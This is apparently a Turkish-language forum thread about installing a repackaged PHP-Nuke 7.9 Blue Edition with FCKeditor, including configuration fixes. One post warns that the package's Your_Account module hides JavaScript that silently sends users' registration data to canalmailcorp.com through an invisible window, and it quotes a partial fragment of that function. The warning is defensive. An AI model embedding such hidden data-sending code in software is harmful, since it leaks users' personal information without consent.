PHP-Nuke 7.9 Blue edition + Fck editor
16/4/2009
We announce to you the new publication based on the
PHP-Nuke 7.9 thrown in the Club (www.phpnuke.org)
This piece of news be reread it incorporates the proper changes of
PHP-Nuke 7.9 Blue Edition: New forums phpBB 2.0.21, new system for banear IPs,
new system that there stores the last IP detected in our users to be able to have
them identified and also, FCKeditor 2.3, and some aesthetic changes.
As for safety Chatserv v3.2e, NukeSentinel(tm) v2.5.0, Hack Alert 1.0 and other things that we have corrected of minor importance.
can unload it from here
#######################################
Chatserv v3.2e
PHPBB v3.0b
FCKeditor 2.3 Extreme
NukeSentinel(tm) v2.5.0 New
Nukestyles Enlaced Downloads 1.8
Increase of the speed 30x compared to PHPNuke.
Reduction of 30 % in low code.
It helps with the control of MMCache and with the Accelerator.
Optimization 50 % of the database.
Policyholder against the UNION and against attacks.
Removed the Vulnerable Modules for the increasing safety.
... and many more options
Ultima Actualización: 23-07-2006
fck editör eklenmiş PHPNuke.7.9.Blue.Edition sürümde burda
http://webs.ono.com/estrenosdivx/PHPNuke.7.9.Blue.Edition.rar
editör açılmazsa eğer
/includes/FCKeditor de fckeditor.php yi
$this->InstanceName = $instanceName ;
$strBP = dirname($_SERVER['PHP_SELF']);
if ($strBP{strlen($strBP)-1} != "/") $strBP .= "/";
$strBP .= '../includes/FCKeditor/';
$this->BasePath = $strBP;
$this->Width = '100%' ;
$this->Height = '400' ;
$this->ToolbarSet = 'PHPNuke' ;
$this->Value = '' ;
bu şekilde ayarlayın çalışacaktır
Dikkat ! Alıntı
Kurulumu tamamladığım sırada tarayıcıda yeni bir pencere açılıp kapandı.Biraz araştırdım bakın ne buldum..
modules/Your_Account/index.php'den bir örnek:
function enviar2(pais,email,cp,ocupacion,sector,sexo,fec_ncto,listas)
{
var url='http://www.canalmailcorp.com/Contenido
Yani fazla zeki arkadaşlar 0 x 0'lık bir pencere ile gizlediklerini düşündükleri bilgilerinizi
canalmailcorp.com adresine anında yolluyorlar.7.9 sürümünde karşılaştım bununla.Hack amaçlı
değil de spam amaçlı yapmışlar ama siz yine de önleminizi alın.Kurduysanız yol yakınken dönün
ya da üyelikle ilgili dosyaları temizleyip admin şifrenizi değiştirin..

Konu: PHP-Nuke
kusura bakma baya uzadı
ancak kontrol edebildim
bul
Kod: ‹ Seç › ‹ Daralt ›
// Error reporting, to be set in config.php
// Modified by Raven 11/22/2005
error_reporting(E_ALL^E_NOTICE);
if($display_errors) {
@ini_set('display_errors', 1);
// error_reporting(E_ALL^E_NOTICE);
} else {
@ini_set('display_errors', 0);
// error_reporting(0);
}
bununla değiş
Kod: ‹ Seç ›
@ini_set('display_errors', 0);
error_reporting(0);
sql sorgulatırken latin1 seçtiyseniz başka da dil problemi olmaması lağzım
kolay gelsin
Dil SORUNU YAŞAYANLAR BUNU UYGULAYABİLİRLER
Bağlantı »
Konu: PHP-Nuke 7.9 Blue edition kurulumu
kurulumda sentinel den ban yerseniz
localhost ta kurun admin panelden sentineli pasif yapın sql yedeğini alın
ondan sonra hostta kurabilirsiniz
Bağlantı »